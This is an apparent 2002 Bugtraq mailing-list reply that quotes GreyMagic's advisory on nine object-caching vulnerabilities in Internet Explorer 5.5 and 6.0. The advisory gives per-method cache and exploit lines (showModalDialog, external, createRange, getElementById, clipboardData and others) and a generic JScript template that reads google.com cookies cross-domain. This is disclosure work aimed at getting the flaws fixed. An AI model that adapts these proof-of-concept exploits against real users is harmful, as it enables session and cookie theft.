The external method flaw also seems to affects my ie6 sp1 browser -- jelmer
----- Original Message ----- From: "GreyMagic Software" <[EMAIL PROTECTED]> To: "Bugtraq" <[EMAIL PROTECTED]> Sent: Tuesday, October 22, 2002 5:24 PM Subject: Vulnerable cached objects in IE (9 advisories in 1) > GreyMagic Security Advisory GM#012-IE > ===================================== > > By GreyMagic Software, Israel. > 22 Oct 2002. > > Available in HTML format at http://security.greymagic.com/adv/gm012-ie/. > > Topic: Vulnerable cached objects in IE (9 advisories in 1). > > Discovery date: 4 Oct 2002, 17 Oct 2002, 21 Oct 2002. > > Affected applications: > ====================== > > Microsoft Internet Explorer 5.5 and 6.0; prior versions and IE6 SP1 are not > vulnerable. > > Note that any other application that uses Internet Explorer's engine > (WebBrowser control) is affected as well (AOL Browser, MSN Explorer, etc.). > > > Introduction: > ============= > > When communicating between windows, security checks ensure that both pages > are in the same security zone and on the same domain. These crucial security > checks wrongly assume that certain methods and objects are only going to be > called through their respective window. This assumption enables some cached > methods and objects to provide interoperability between otherwise separated > documents. > > Many security issues arise from storing references to objects that are > supposed to be inaccessible when the page unloads. PivX lately disclosed > such an issue in the <object> element, which left a valid reference in its > "object" property. > > Discussion: > =========== > > Through exhaustive research, we discovered nine vulnerabilities in Internet > Explorer involving object caching, most of them highly critical. We're > grouping all of these vulnerabilities into this advisory in order to avoid a > flood and repetitive statements. > > Object caching takes place when the attacker opens a window to a page in his > own site. The URL in the window is then changed to the victim page, but the > cached references stay in place, providing direct access to the new > document. > > All nine vulnerabilities are of the same general class (object caching). > However, each of them is a separate vulnerability, which uses a unique > method for exploitation. > > Each item in the list below consists of three parts, "Cache" shows how to > cache the vulnerable object, "Exploit" shows how the vulnerability works in > context and "Impact" details the implications of the vulnerability. > > "Full access" means access to any page's Document Object Model in any domain > and any zone. The implications include (but not limited to) reading cookies > from any domain, forging content in any URL, reading local files and > executing arbitrary programs. > > > 1. showModalDialog > > Cache: var fVuln=oWin.showModalDialog; > Exploit - IE 5.5: > fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,""); > Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg" > vulnerability. > Impact: Full access in IE5.5, "My Computer" zone access in IE6. > > > 2. external > > Cache: var oVuln=oWin.external; > Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","",""); > Impact: Full access. > > > 3. createRange > > Cache: var fVuln=oWin.document.selection.createRange; > Exploit: fVuln().pasteHTML("<img > src=\"javascript:alert(document.cookie)\">"); > Impact: Full access. > > > 4. elementFromPoint > > Cache: var fVuln=oWin.document.elementFromPoint; > Exploit: alert(fVuln(1,1).document.cookie); > Impact: Full access. > > > 5. getElementById > > Cache: var fVuln=oWin.document.getElementById; > Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie); > Impact: Full access. > > > 6. getElementsByName > > Cache: var fVuln=oWin.document.getElementsByName; > Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie); > Impact: Full access. > > > 7. getElementsByTagName > > Cache: var fVuln=oWin.document.getElementsByTagName; > Exploit: alert(fVuln("BODY")[0].document.cookie); > Impact: Full access. > > > 8. execCommand > > Cache: var fVuln=oWin.document.execCommand; > Exploit: fVuln("SelectAll"); fVuln("Copy"); > alert(clipboardData.getData("text")); > Impact: Read access to the loaded document. > > > 9. clipboardData > > Cache: var oVuln=oWin.clipboardData; > Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data"); > Impact: Read/write access to the clipboard, regardless of settings. > > > IE 5 SP2 and IE6 SP1 are not vulnerable. > > > Exploit: > ======== > > This generic exploit demonstrates how an attacker may read the client's > "google.com" cookie using one of the cached objects above. > > <script language="jscript"> > var oWin=open("blank.html","victim","width=100,height=100"); > [Cache line here] > location.href="http://google.com";; > setTimeout( > function () { > [Exploit line(s) here] > }, > 3000 > ); > </script> > > > Solution: > ========= > > Until a patch becomes available either disable Active Scripting or upgrade > to IE6 SP1. > > > Tested on: > ========== > > IE5.5 Win98. > IE5.5 NT4. > IE6 Win98. > IE6 Win2000. > IE6 WinXP. > > > Demonstration: > ============== > > We put together a single nine-in-one proof of concept demonstration, which > can be found at http://security.greymagic.com/adv/gm012-ie/. > > > Feedback: > ========= > > Please mail any questions or comments to [EMAIL PROTECTED] > > - Copyright © 2002 GreyMagic Software. > > >
